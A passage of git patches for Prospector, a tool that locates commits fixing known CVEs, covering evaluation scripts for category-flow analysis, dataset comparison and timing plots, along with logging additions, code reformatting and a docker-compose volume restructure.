list, value: list): if cve1 == cve2: transitions[cat1][cat2] += 1 print(transitions) + + +def difference_ground_truth_datasets(): + """To find out if two ground truth datasets contain the same CVEs.""" + filepath1 = "evaluation/data/input/d63.csv" + filepath2 = "evaluation/data/input/d63_mvi.csv" + + ids_file1 = _read_first_column(filepath1) + ids_file2 = _read_first_column(filepath2) + + unique_to_file1 = ids_file1 - ids_file2 + unique_to_file2 = ids_file2 - ids_file1 + + print(f"IDs in {filepath1} but not in {filepath2}:") + for id in sorted(unique_to_file1): + print(id) + + print(f"\nIDs in {filepath2} but not in {filepath1}:") + for id in sorted(unique_to_file2): + print(id) + + +def _read_first_column(file_path): + with open(file_path, "r") as file: + reader = csv.reader(file, delimiter=";") + return set(row[0] for row in reader) diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index 1e452b0a1..ab5e94b71 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -8,9 +8,11 @@ analyse_category_flows, analyse_prospector_reports, count_existing_reports, + difference_ground_truth_datasets, ) from evaluation.analyse_statistics import ( analyse_statistics, + candidates_execution_time, commit_classification_time, overall_execution_time, ) @@ -81,9 +83,16 @@ def parse_cli_args(args): ) parser.add_argument( - "-sa", - "--sankey", - help="Create a Sankey Diagram with detailed summary execution JSON files.", + "-fl", + "--flow", + help="Analyse which CVEs changed from one category to another given two detailed summary execution JSON files.", + action="store_true", + ) + + parser.add_argument( + "-t", + "--temporary", + help="Run whichever temporary function is set to temporary. This allows you to write use-once function and run it easily.", action="store_true", ) @@ -102,8 +111,10 @@ def main(argv): if args.stats: # analyse_statistics(args.input) # overall_execution_time(args.input) - commit_classification_time(args.input) - elif args.sankey: + # commit_classification_time(args.input) + candidates_execution_time(args.input) + + elif args.flow: analyse_category_flows() # analysis of Prospector reports else: @@ -117,6 +128,9 @@ def main(argv): elif not args.analyze and not args.execute and args.count: count_existing_reports(args.input) + elif not args.analyze and not args.execute and args.temporary: + difference_ground_truth_datasets() + # Cannot choose both analyse and execute, stop here. elif args.analyze and args.execute: sys.exit("Choose either to execute or analyze") From 7820c32808810c8554d4fb02f4e0866ae004b098 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 7 Aug 2024 08:42:37 +0000 Subject: [PATCH 091/130] [ADD] function to see correlation between time needed for execution and number of candidates --- prospector/evaluation/analyse_statistics.py | 61 +++++++++++++++++++++ 1 file changed, 61 insertions(+) diff --git a/prospector/evaluation/analyse_statistics.py b/prospector/evaluation/analyse_statistics.py index 8d2cf4976..f3e3c8eed 100644 --- a/prospector/evaluation/analyse_statistics.py +++ b/prospector/evaluation/analyse_statistics.py @@ -266,3 +266,64 @@ def commit_classification_time(input_file: str): f"{ANALYSIS_RESULTS_PATH}plots/commit-classification-time.png", dpi=300 ) plt.close() + + +def candidates_execution_time(input_file: str): + """Creates a plot to see the relationship between number of candidates and + time needed for the execution.""" + data = { + "cve_id": [], + "execution_times": [], + "num_candidates": [], + } + + file = f"{INPUT_DATA_PATH}{input_file}.csv" + dataset = load_dataset(file) + # dataset = dataset[:100] + + directories = { + "NVI": "evaluation/data/reports_without_llm_mvi", + # "MVI": "evaluation/data/reports_with_llm_mvi", + } + + for batch, path in directories.items(): + for record in dataset: + try: + if record[0] == "CVE-2020-8134": + continue + report = load_json_file(f"{path}/{record[0]}.json") + exec_time = report["processing_statistics"]["core"][ + "execution time" + ][0] + cands = report["processing_statistics"]["core"]["candidates"] + + except Exception as e: + print(f"Did not process {record[0]} because of {e}") + continue + + data["cve_id"].append(record[0]) + data["execution_times"].append(exec_time) + data["num_candidates"].append(cands) + + # Create the plot + plt.figure(figsize=(10, 6)) + + df = pd.DataFrame.from_dict(data) + print(df) + sns.jointplot(x="execution_times", y="num_candidates", data=df, kind="reg") + + # Save the figure + plt.savefig( + f"{ANALYSIS_RESULTS_PATH}plots/correlation-time-num-candidates.png", + dpi=300, + ) + plt.close() + + # Histogram for the number of candidates + plt.figure(figsize=(10, 6)) + plt.hist(df["num_candidates"], bins=30, edgecolor="black") + plt.title("Distribution of Number of Candidates") + plt.xlabel("Number of Candidates") + plt.ylabel("Frequency") + plt.savefig(f"{ANALYSIS_RESULTS_PATH}plots/candidates-distribution.png") + plt.close() From fe67a7d534662c5157f8248f529ebd06b89ee6de Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 9 Aug 2024 09:08:28 +0000 Subject: [PATCH 092/130] [DOC] adds logging statements for git commands and which period of tags will be retrieved --- prospector/core/prospector.py | 7 +++++++ prospector/git/git.py | 4 ++-- prospector/git/version_to_tag.py | 32 ++++++++++++++++++++++++-------- 3 files changed, 33 insertions(+), 10 deletions(-) diff --git a/prospector/core/prospector.py b/prospector/core/prospector.py index 20b269e41..89c21db02 100644 --- a/prospector/core/prospector.py +++ b/prospector/core/prospector.py @@ -1,5 +1,6 @@ # flake8: noqa +from datetime import datetime, timezone import logging import os import sys @@ -137,6 +138,9 @@ def prospector( # noqa: C901 if len(candidates) > 0 and any( [c for c in candidates if c in commits_in_advisory_references] ): + logger.info( + f"Found commits referenced in advisory:{commits_in_advisory_references}." + ) console.print("Fixing commit found in the advisory references\n") advisory_record.has_fixing_commit = True @@ -512,6 +516,9 @@ def get_commits_from_tags( ) if len(candidates) == 0: + logger.info( + f"No commands found with tags, defaulting to commits within 60 days of advisory reserved date: {datetime.fromtimestamp(advisory_record.reserved_timestamp, tz=timezone.utc)}" + ) candidates = repository.create_commits( since=advisory_record.reserved_timestamp - time_limit_before, diff --git a/prospector/git/git.py b/prospector/git/git.py index 7a3c93c6c..dd30021c3 100644 --- a/prospector/git/git.py +++ b/prospector/git/git.py @@ -334,7 +334,7 @@ def create_commits( cmd += " *." + " *.".join(filter_extension) try: - logger.debug(cmd) + logger.debug(f"Executing git command: {cmd}") out = self.execute(cmd) return self.parse_git_output(out) @@ -447,7 +447,7 @@ def get_timestamp(self, item: str, ts_format: str) -> int: # ct is committer date, it is the default for the research using --until and --since out = self.execute(f"git log -1 --format=%{ts_format}t {item}") logger.debug( - f"Got timestampe with `git log -1 --format=%{ts_format}t {item}`." + f"Got timestamp with `git log -1 --format=%{ts_format}t {item}`." ) return int(out[0]) diff --git a/prospector/git/version_to_tag.py b/prospector/git/version_to_tag.py index 7cc4c15a1..d1b37d5fe 100644 --- a/prospector/git/version_to_tag.py +++ b/prospector/git/version_to_tag.py @@ -20,7 +20,9 @@ def is_rc_or_date(tag: str) -> bool: def get_possible_missing_tag( - tags: list[str], prev_tag: Optional[str] = None, next_tag: Optional[str] = None + tags: list[str], + prev_tag: Optional[str] = None, + next_tag: Optional[str] = None, ): """Given the tag list and a tag, return either the previous or the next tag candidates.""" if next_tag is None: @@ -74,7 +76,9 @@ def ends_with_zero(version: str): # flake8: noqa: C901 -def get_possible_tags(tags: list[str], versions: str, unsupervised: bool = True): +def get_possible_tags( + tags: list[str], versions: str, unsupervised: bool = True +): """Given a list of tags and a version interval, return the possible tag interval that matches.""" prev_version, next_version = versions.replace("None", "").split(":") prev_tag = handle_tag_or_substring(prev_version, tags) @@ -98,20 +102,28 @@ def get_possible_tags(tags: list[str], versions: str, unsupervised: bool = True) return prev_tag[0], next_tag[0] elif len(prev_tag) == 1 and len(next_tag) > 1: next_tag = [ - tag for tag in next_tag if tag != prev_tag[0] or tag not in prev_tag[0] + tag + for tag in next_tag + if tag != prev_tag[0] or tag not in prev_tag[0] ] # this may lead to empty list logger.info(f"Possible tags are:{prev_tag}:{next_tag}") return ( prev_tag[0], - next_tag[0], # difflib.get_close_matches(prev_tag[0], next_tag, n=1)[0], + next_tag[ + 0 + ], # difflib.get_close_matches(prev_tag[0], next_tag, n=1)[0], ) elif len(prev_tag) > 1 and len(next_tag) == 1: prev_tag = [ - tag for tag in prev_tag if tag != next_tag[0] or next_tag[0] not in tag + tag + for tag in prev_tag + if tag != next_tag[0] or next_tag[0] not in tag ] logger.info(f"Possible tags are:{prev_tag}:{next_tag}") return ( - prev_tag[-1], # difflib.get_close_matches(next_tag[0], prev_tag, n=1)[0], + prev_tag[ + -1 + ], # difflib.get_close_matches(next_tag[0], prev_tag, n=1)[0], next_tag[0], ) # If there is one exact match but no candidates for the other tag, exit and hint the user with possible candidates @@ -128,8 +140,12 @@ def get_possible_tags(tags: list[str], versions: str, unsupervised: bool = True) elif len(prev_tag) > 1 and len(next_tag) > 1: logger.info("Multiple tag candidates found.") else: - prev_tag = [tag for tag in tags if prev_version in clean_tag(tag, False)] - next_tag = [tag for tag in tags if next_version in clean_tag(tag, False)] + prev_tag = [ + tag for tag in tags if prev_version in clean_tag(tag, False) + ] + next_tag = [ + tag for tag in tags if next_version in clean_tag(tag, False) + ] # print(f"Possible tags are:\n\t{prev_tag}\n\t{next_tag}") if len(prev_tag) == 1 and len(next_tag) == 1: return prev_tag[0], next_tag[0] From ca2492549679f4668709d5c4fd3aab27804d804f Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 9 Aug 2024 12:26:15 +0000 Subject: [PATCH 093/130] [FIX] makes sure that only commits referenced in the advisory's references with a commit hash are treated as 'fixing commits', and not if the commit is eg. 'commit::master' --- prospector/datamodel/advisory.py | 2 ++ prospector/datamodel/nlp.py | 22 +++++++++++++++++----- 2 files changed, 19 insertions(+), 5 deletions(-) diff --git a/prospector/datamodel/advisory.py b/prospector/datamodel/advisory.py index 55b7ba2bb..767e4ca6a 100644 --- a/prospector/datamodel/advisory.py +++ b/prospector/datamodel/advisory.py @@ -210,6 +210,8 @@ def get_commits_in_advisory_references(self) -> List[str]: } limit += 1 + # Filter out references that are not commit hashes, eg. commit::master + hex_pattern = re.compile(r"^[a-fA-F0-9]+$") return [ ref.split("::")[1] for ref in self.references diff --git a/prospector/datamodel/nlp.py b/prospector/datamodel/nlp.py index 573165494..b50b87c31 100644 --- a/prospector/datamodel/nlp.py +++ b/prospector/datamodel/nlp.py @@ -50,10 +50,14 @@ def extract_words_from_text(text: str) -> List[str]: ] -def find_similar_words(adv_words: Set[str], commit_msg: str, exclude: str) -> Set[str]: +def find_similar_words( + adv_words: Set[str], commit_msg: str, exclude: str +) -> Set[str]: """Extract nouns from commit message that appears in the advisory text""" commit_words = { - word for word in extract_words_from_text(commit_msg) if word not in exclude + word + for word in extract_words_from_text(commit_msg) + if word not in exclude } return commit_words.intersection(adv_words) # return [word for word in extract_words_from_text(commit_msg) if word in adv_words] @@ -63,7 +67,9 @@ def extract_versions(text: str) -> List[str]: """ Extract all versions mentioned in the text """ - return list(set(re.findall(r"(\d+(?:\.\d+)+)", text))) # Should be more accurate + return list( + set(re.findall(r"(\d+(?:\.\d+)+)", text)) + ) # Should be more accurate # return re.findall(r"[0-9]+\.[0-9]+[0-9a-z.]*", text) @@ -134,7 +140,8 @@ def extract_filename(text: str, relevant_extensions: List[str]) -> List[str]: # This regex covers cases with various camelcase filenames and underscore, dash names if bool( re.search( - r"(?:[a-z]|[A-Z])[a-zA-Z]+[A-Z]\w*|(?:[a-zA-Z]{2,}[_-])+[a-zA-Z]{2,}", text + r"(?:[a-z]|[A-Z])[a-zA-Z]+[A-Z]\w*|(?:[a-zA-Z]{2,}[_-])+[a-zA-Z]{2,}", + text, ) ): return [text], None @@ -195,7 +202,12 @@ def extract_cve_references(text: str) -> List[str]: Extract CVE identifiers """ return list( - set([result.group(0) for result in re.finditer(r"CVE-\d{4}-\d{4,8}", text)]) + set( + [ + result.group(0) + for result in re.finditer(r"CVE-\d{4}-\d{4,8}", text) + ] + ) ) From ad94c050624b0e95983bb4784b639b78e77de994 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 9 Aug 2024 12:28:26 +0000 Subject: [PATCH 094/130] [ADD] function to choose which set of strong rules should be used + function to analyse the category flows when there is no mutual exclusion between the high confidence categories --- prospector/evaluation/analyse.py | 254 +++++++++++++++++++++---------- 1 file changed, 170 insertions(+), 84 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index aa9ffa06e..f28bc0fd0 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -30,46 +30,72 @@ use_old_rule_names = True if "matteo" in PROSPECTOR_REPORT_PATH else False -if cc_rule_as_strong_rule and not use_old_rule_names: - STRONG_RULES = [ - "COMMIT_IN_REFERENCE", - "VULN_ID_IN_MESSAGE", - "XREF_BUG", - "XREF_GH", - "VULN_ID_IN_LINKED_ISSUE", +def _choose_strong_rules( + cc_rule_as_strong_rule: bool, use_old_rule_names: bool +) -> List[str]: + """Return the list of strong rules, given the settings.""" + if cc_rule_as_strong_rule and not use_old_rule_names: + STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_MESSAGE", + "XREF_BUG", + "XREF_GH", + "VULN_ID_IN_LINKED_ISSUE", + "COMMIT_IS_SECURITY_RELEVANT", + ] + elif use_old_rule_names and not cc_rule_as_strong_rule: + STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "CVE_ID_IN_MESSAGE", + "CROSS_REFERENCED_JIRA_LINK", + "CROSS_REFERENCED_GH_LINK", + "CVE_ID_IN_LINKED_ISSUE", + ] + else: + STRONG_RULES = [ + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_MESSAGE", + "XREF_BUG", + "XREF_GH", + "VULN_ID_IN_LINKED_ISSUE", + ] + + return STRONG_RULES + + +STRONG_RULES = _choose_strong_rules(cc_rule_as_strong_rule, use_old_rule_names) + + +if not cc_rule_as_strong_rule and not use_old_rule_names: + WEAK_RULES = [ + "CHANGES_RELEVANT_FILES", "COMMIT_IS_SECURITY_RELEVANT", - ] -elif use_old_rule_names: - STRONG_RULES = [ - "COMMIT_IN_REFERENCE", - "CVE_ID_IN_MESSAGE", - "CROSS_REFERENCED_JIRA_LINK", - "CROSS_REFERENCED_GH_LINK", - "CVE_ID_IN_LINKED_ISSUE", + "CHANGES_RELEVANT_CODE", + "RELEVANT_WORDS_IN_MESSAGE", + "ADV_KEYWORDS_IN_FILES", + "ADV_KEYWORDS_IN_MSG", + "SEC_KEYWORDS_IN_MESSAGE", + "SEC_KEYWORDS_IN_LINKED_GH", + "SEC_KEYWORDS_IN_LINKED_BUG", + "GITHUB_ISSUE_IN_MESSAGE", + "BUG_IN_MESSAGE", + "COMMIT_HAS_TWINS", ] else: - STRONG_RULES = [ - "COMMIT_IN_REFERENCE", - "VULN_ID_IN_MESSAGE", - "XREF_BUG", - "XREF_GH", - "VULN_ID_IN_LINKED_ISSUE", + WEAK_RULES = [ + "CHANGES_RELEVANT_FILES", + "CHANGES_RELEVANT_CODE", + "RELEVANT_WORDS_IN_MESSAGE", + "ADV_KEYWORDS_IN_FILES", + "ADV_KEYWORDS_IN_MSG", + "SEC_KEYWORDS_IN_MESSAGE", + "SEC_KEYWORDS_IN_LINKED_GH", + "SEC_KEYWORDS_IN_LINKED_BUG", + "GITHUB_ISSUE_IN_MESSAGE", + "BUG_IN_MESSAGE", + "COMMIT_HAS_TWINS", ] -WEAK_RULES = [ - "CHANGES_RELEVANT_FILES", - "CHANGES_RELEVANT_CODE", - "RELEVANT_WORDS_IN_MESSAGE", - "ADV_KEYWORDS_IN_FILES", - "ADV_KEYWORDS_IN_MSG", - "SEC_KEYWORDS_IN_MESSAGE", - "SEC_KEYWORDS_IN_LINKED_GH", - "SEC_KEYWORDS_IN_LINKED_BUG", - "GITHUB_ISSUE_IN_MESSAGE", - "BUG_IN_MESSAGE", - "COMMIT_HAS_TWINS", -] - def analyse_prospector_reports(filename: str): """Analyses Prospector reports. Creates the summary_execution_results table.""" @@ -186,7 +212,10 @@ def analyse_prospector_reports(filename: str): ) # Save detailed results in a json file (instead of cluttering logs) - _save_summary_execution_details(results, reports_not_found) + path = _save_summary_execution_details(results, reports_not_found) + logger.info( + f"Saved summary execution details (lists of CVEs for each category) to {path}." + ) def _analyse_report( @@ -238,13 +267,24 @@ def _analyse_report( # First candidate is one of the fixing commits if i <= NUM_TOP_COMMITS and candidates_in_fixing_commits: matched_rules = [rule["id"] for rule in commit["matched_rules"]] + strong_matched_rules = list( + set(STRONG_RULES).intersection(set(matched_rules)) + ) + # increase count at high, but only count once here + if len(strong_matched_rules) > 0: + results["high"].append(cve_id) + + for strong_matched_rule in strong_matched_rules: + results[strong_matched_rule].append(cve_id) + return - # check for strong rules - for rule in STRONG_RULES: - if rule in matched_rules: - results[rule].append(cve_id) - results["high"].append(cve_id) - return + # # check for strong rules + # for rule in STRONG_RULES: + # mutually exclusive + # if rule in matched_rules: + # results[rule].append(cve_id) + # results["high"].append(cve_id) + # return if i <= 0 and candidates_in_fixing_commits: # check for weak rules @@ -301,9 +341,15 @@ def _list_intersection(list1, list2): return list(set(list1) & set(list2)) -def _save_summary_execution_details(results: dict, reports_not_found: list): +def _save_summary_execution_details( + results: dict, reports_not_found: list +) -> str: """Saves the detailed content (including the list of CVEs for each category - of the summary execution table to a JSON file.""" + of the summary execution table to a JSON file. + + Returns: + The filepath where the details were saved to. + """ batch_name = os.path.basename(os.path.normpath(PROSPECTOR_REPORT_PATH)) detailed_results_output_path = ( f"{ANALYSIS_RESULTS_PATH}summary_execution/{batch_name}.json" @@ -322,6 +368,7 @@ def _save_summary_execution_details(results: dict, reports_not_found: list): existing_data["summary_execution_details"].append(printout) save_dict_to_json(existing_data, detailed_results_output_path) + return detailed_results_output_path def count_existing_reports(data_filepath): @@ -351,7 +398,7 @@ def analyse_category_flows(): JSON files with the detailed summary execution results. The detailed summary execution results are created when executing - `analyse_prospector_reports`. + `analyse_prospector_reports`. Uses the last entry in these files. Saves the output to `summary_execution/flow-analysis.json`. """ @@ -395,41 +442,66 @@ def _create_cve_to_category_mapping(results: dict) -> dict: return res -# Create Sankey Diagram to see how the reports change category -def _create_sankey_diagram(source: list, target: list, value: list): - """Creates a sankey diagram between two files containing summary execution - details, ie. a json file with a `results` field containing: - - high - - commit in reference - - vuln id in message - - vuln id in linked issue - - xref bug - - medium - - low - - not_found - - not_reported - - false_positive - - Attention: Not finished! +def analyse_category_flows_no_mutual_exclusion(): + """Analyse which CVEs changed category in different executions given two + JSON files with the detailed summary execution results. + + The detailed summary execution results are created when executing + `analyse_prospector_reports`. Uses the last entry in these files. + + Saves the output to `summary_execution/flow-analysis.json`. """ - data = load_json_file( - f"{ANALYSIS_RESULTS_PATH}summary_execution/{filename1}.json" + data1 = load_json_file(COMPARE_DIRECTORY_1)["summary_execution_details"][-1] + data2 = load_json_file(COMPARE_DIRECTORY_2)["summary_execution_details"][-1] + + # Skip the `high` category + categories = [ + "COMMIT_IN_REFERENCE", + "VULN_ID_IN_MESSAGE", + "VULN_ID_IN_LINKED_ISSUE", + "XREF_BUG", + "medium", + "low", + "not_found", + "not_reported", + "false_positive", + "missing", + ] + + # Create the dictionary structure + transitions = {} + + for category in categories: + transitions[category] = {"data1": [], "data2": []} + + # Whichever ones do not have a report in both sets (Matteo and me), do not consider them and just list them as missing. + transitions["missing"]["data1"] = data1["missing"] + transitions["missing"]["data2"] = data2["missing"] + + missing = data1["missing"] + data2["missing"] + + categories.remove("missing") + # For each category, get which ones are in first, but not in second and in second but not in first + for category in categories: + d1, d2 = _get_symmetric_difference( + data1["results"][category], data2["results"][category], missing + ) + transitions[category]["data1"] = d1 + transitions[category]["data2"] = d2 + + save_dict_to_json( + transitions, + f"{ANALYSIS_RESULTS_PATH}summary_execution/flow-analysis.json", ) - details = data.get("summary_execution_details", []) - results = details[-1].get("results", {}) - # Initialize a dictionary to hold transitions - transitions = defaultdict(lambda: defaultdict(int)) - # Create a list of categories and CVEs - cve_categories = [ - (category, cve) for category, cves in results.items() for cve in cves - ] - for i, (cat1, cve1) in enumerate(cve_categories): - for cat2, cve2 in cve_categories[i + 1 :]: - if cve1 == cve2: - transitions[cat1][cat2] += 1 - print(transitions) +def _get_symmetric_difference(list1: list, list2: list, ignore: list): + """Returns two lists: the first containing elements that are only in list1 + but not in list2 and the second one vice versa. + """ + return list(set(list1) - set(list2) - set(ignore)), list( + set(list2) - set(list1) - set(ignore) + ) def difference_ground_truth_datasets(): @@ -437,11 +509,14 @@ def difference_ground_truth_datasets(): filepath1 = "evaluation/data/input/d63.csv" filepath2 = "evaluation/data/input/d63_mvi.csv" - ids_file1 = _read_first_column(filepath1) - ids_file2 = _read_first_column(filepath2) + dataset1 = load_dataset(filepath1) + dataset2 = load_dataset(filepath2) + + ids_dataset1 = set(record[0] for record in dataset1) + ids_dataset2 = set(record[0] for record in dataset2) - unique_to_file1 = ids_file1 - ids_file2 - unique_to_file2 = ids_file2 - ids_file1 + unique_to_file1 = ids_dataset1 - ids_dataset2 + unique_to_file2 = ids_dataset2 - ids_dataset1 print(f"IDs in {filepath1} but not in {filepath2}:") for id in sorted(unique_to_file1): @@ -451,8 +526,19 @@ def difference_ground_truth_datasets(): for id in sorted(unique_to_file2): print(id) + # Find differences in fixing commits + different_fixing_commits = [] + + ids_and_fixing1 = {} + for record in dataset1: + ids_and_fixing1[record[0]] = record[4] + + ids_and_fixing2 = {} + for record in dataset2: + ids_and_fixing2[record[0]] = record[4] + + for k, v in ids_and_fixing1.items(): + if v != ids_and_fixing2.get(k, ""): + different_fixing_commits.append((k, v)) -def _read_first_column(file_path): - with open(file_path, "r") as file: - reader = csv.reader(file, delimiter=";") - return set(row[0] for row in reader) + print(f"\nDifferent fixing commits: {len(different_fixing_commits)}") From 22319bd50bb203bb092a324c977a17439dda2b91 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 9 Aug 2024 12:29:36 +0000 Subject: [PATCH 095/130] [ADD] information about which CVEs are missing reports for both directories being compared --- prospector/evaluation/compare.py | 33 ++++++++++++++++++++++++++++++-- prospector/evaluation/main.py | 4 +++- prospector/util/http.py | 25 ++++++++++++++++++------ 3 files changed, 53 insertions(+), 9 deletions(-) diff --git a/prospector/evaluation/compare.py b/prospector/evaluation/compare.py index 0a8e3dfda..76da0a928 100644 --- a/prospector/evaluation/compare.py +++ b/prospector/evaluation/compare.py @@ -5,6 +5,7 @@ import os from evaluation.utils import ( ANALYSIS_RESULTS_PATH, + load_dataset, logger, config, load_json_file, @@ -87,11 +88,17 @@ def main(): logger.info(f"Comparing reports in {directory1} and {directory2}.") + file = "evaluation/data/input/d63.csv" + dataset = load_dataset(file) + ## Things to measure counterpart_exists = [] missing_in_directory1 = [] missing_in_directory2 = [] + missing_in_1_compared_to_gt = [] + missing_in_2_compared_to_gt = [] + entirely_same = [] same_references = [] same_first_candidate = [] @@ -111,6 +118,14 @@ def main(): # get reports from second directory reports2 = [f for f in os.listdir(directory2)] + # Get how many reports are missing compared to the ground truth + for report in dataset: + if f"{report[0]}.json" not in reports1: + missing_in_1_compared_to_gt.append(report[0]) + + if f"{report[0]}.json" not in reports2: + missing_in_2_compared_to_gt.append(report[0]) + for report in reports1: if report not in reports2: missing_in_directory2.append(report) @@ -169,9 +184,23 @@ def main(): "timestamp": datetime.now().strftime("%d-%m-%Y, %H:%M"), "directory1": directory1, "directory2": directory2, + "directory1_vs_gt": { + "count": len(missing_in_1_compared_to_gt), + "reports": missing_in_1_compared_to_gt, + }, + "directory2_vs_gt": { + "count": len(missing_in_2_compared_to_gt), + "reports": missing_in_2_compared_to_gt, + }, "counterparts_exist": len(counterpart_exists), - "missing_in_directory1": len(missing_in_directory1), - "missing_in_directory2": len(missing_in_directory2), + "missing_in_directory1": { + "count": len(missing_in_directory1), + "reports": missing_in_directory1, + }, + "missing_in_directory2": { + "count": len(missing_in_directory2), + "reports": missing_in_directory2, + }, "reports_comparison": { "entirely_same": len(entirely_same), "same_first_candidate": { diff --git a/prospector/evaluation/main.py b/prospector/evaluation/main.py index ab5e94b71..251d316c3 100644 --- a/prospector/evaluation/main.py +++ b/prospector/evaluation/main.py @@ -6,6 +6,7 @@ from evaluation.analyse import ( analyse_category_flows, + analyse_category_flows_no_mutual_exclusion, analyse_prospector_reports, count_existing_reports, difference_ground_truth_datasets, @@ -115,7 +116,8 @@ def main(argv): candidates_execution_time(args.input) elif args.flow: - analyse_category_flows() + # analyse_category_flows() + analyse_category_flows_no_mutual_exclusion() # analysis of Prospector reports else: analyse_prospector_reports(args.input) diff --git a/prospector/util/http.py b/prospector/util/http.py index feac446c0..c24629843 100644 --- a/prospector/util/http.py +++ b/prospector/util/http.py @@ -8,7 +8,9 @@ from log.logger import logger -def fetch_url(url: str, params=None, extract_text=True) -> Union[str, BeautifulSoup]: +def fetch_url( + url: str, params=None, extract_text=True +) -> Union[str, BeautifulSoup]: """ Fetches the content of a web page located at the specified URL and optionally extracts text from it. @@ -23,8 +25,11 @@ def fetch_url(url: str, params=None, extract_text=True) -> Union[str, BeautifulS If an exception occurs during the HTTP request, an empty string ("") is returned. """ + try: - session = requests_cache.CachedSession("requests-cache", expire_after=604800) + session = requests_cache.CachedSession( + "requests-cache", expire_after=604800 + ) if params is None: content = session.get(url).content else: @@ -75,13 +80,18 @@ def get_urls(url: str) -> List[str]: # TODO: properly scrape github issues -def extract_from_webpage(url: str, attr_name: str, attr_value: List[str]) -> str: +def extract_from_webpage( + url: str, attr_name: str, attr_value: List[str] +) -> str: content = fetch_url(url, None, False) if not content: return "" print(content.get_text()) print( - [result.group(0) for result in re.finditer(r"[A-Z]+-\d+", content.get_text())] + [ + result.group(0) + for result in re.finditer(r"[A-Z]+-\d+", content.get_text()) + ] ) return [ link.get("href") @@ -115,10 +125,13 @@ def get_from_xml(id: str): if item is None or item == -1: return "" relevant_data = [ - itm.text for itm in item.findAll(["description", "summary", "comments"]) + itm.text + for itm in item.findAll(["description", "summary", "comments"]) ] - relevant_data = BeautifulSoup("\n".join(relevant_data), features="html.parser") + relevant_data = BeautifulSoup( + "\n".join(relevant_data), features="html.parser" + ) return " ".join(relevant_data.stripped_strings) except Exception: From 49976cc96740d1ac7d4d86c23b43815d42b47777 Mon Sep 17 00:00:00 2001 From: I748376 Date: Fri, 9 Aug 2024 13:59:41 +0000 Subject: [PATCH 096/130] [DOC] restructures folders to have all reports not in prospector folder (as the docker container won't build because it's getting too big) --- prospector/docker-compose.yml | 7 ++----- prospector/evaluation/dispatch_jobs.py | 3 ++- prospector/evaluation/utils.py | 1 + 3 files changed, 5 insertions(+), 6 deletions(-) diff --git a/prospector/docker-compose.yml b/prospector/docker-compose.yml index 6437bb75e..a54bfed52 100644 --- a/prospector/docker-compose.yml +++ b/prospector/docker-compose.yml @@ -29,11 +29,8 @@ services: dockerfile: docker/worker/Dockerfile volumes: - ./data_sources/reports:/app/data_sources/reports - - ./evaluation/data/reports_with_llm/:/app/evaluation/data/reports_with_llm # Only relevant for evaluation data - - ./evaluation/data/reports_without_llm/:/app/evaluation/data/reports_without_llm # Only relevant for evaluation data - - ./evaluation/data/reports_without_llm_mvi/:/app/evaluation/data/reports_without_llm_mvi # Only relevant for evaluation data - - ./evaluation/data/reports_with_llm_mvi/:/app/evaluation/data/reports_with_llm_mvi # Only relevant for evaluation data - - ./../../../data/gitcache:/tmp/gitcache # LASCHA: check that this is correct + - ./evaluation/data/reports/:/app/evaluation/data/reports + - ./../../../data/gitcache:/tmp/gitcache depends_on: - redis environment: diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 465ff5639..b2d0f1d66 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -9,6 +9,7 @@ from evaluation.utils import ( INPUT_DATA_PATH, PROSPECTOR_REPORT_PATH, + PROSPECTOR_REPORT_PATH_CONTAINER, load_dataset, logger, config, @@ -55,7 +56,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): "cve_id": cve[0], "version_interval": cve[2], "report_type": "json", - "output_file": f"{PROSPECTOR_REPORT_PATH}{cve[0]}.json", + "output_file": f"{PROSPECTOR_REPORT_PATH_CONTAINER}{cve[0]}.json", "repository_url": cve[1], }, description="Prospector Job", diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index c9fbad73a..bc7f5a8e4 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -12,6 +12,7 @@ INPUT_DATA_PATH = config.input_data_path # Select the folder depending whether LLMs are used or not PROSPECTOR_REPORT_PATH = config.prospector_reports_path +PROSPECTOR_REPORT_PATH_CONTAINER = config.prospector_reports_path_container ANALYSIS_RESULTS_PATH = config.analysis_results_path # Comparison dirs COMPARE_DIRECTORY_1 = config.compare_directory1 From a9caf278f516473ac8b4bdb05e08ce733455a4c5 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 07:58:01 +0000 Subject: [PATCH 097/130] [FIX] fixes bug when extracting text from Jira Refs --- prospector/util/http.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/prospector/util/http.py b/prospector/util/http.py index c24629843..48b93c80d 100644 --- a/prospector/util/http.py +++ b/prospector/util/http.py @@ -126,7 +126,7 @@ def get_from_xml(id: str): return "" relevant_data = [ itm.text - for itm in item.findAll(["description", "summary", "comments"]) + for itm in item.find_all(["description", "summary", "comments"]) ] relevant_data = BeautifulSoup( From 27a61a3c7bbeee64b60dee1b59909909483311e9 Mon Sep 17 00:00:00 2001 From: I748376 Date: Wed, 14 Aug 2024 08:54:00 +0000 Subject: [PATCH 098/130] [FIX] fixes mistake in filtering out the 'commit::master' references --- prospector/datamodel/advisory.py | 1 - 1 file changed, 1 deletion(-) diff --git a/prospector/datamodel/advisory.py b/prospector/datamodel/advisory.py index 767e4ca6a..7c0f7fc9b 100644 --- a/prospector/datamodel/advisory.py +++ b/prospector/datamodel/advisory.py @@ -211,7 +211,6 @@ def get_commits_in_advisory_references(self) -> List[str]: limit += 1 # Filter out references that are not commit hashes, eg. commit::master - hex_pattern = re.compile(r"^[a-fA-F0-9]+$") return [ ref.split("::")[1] for ref in 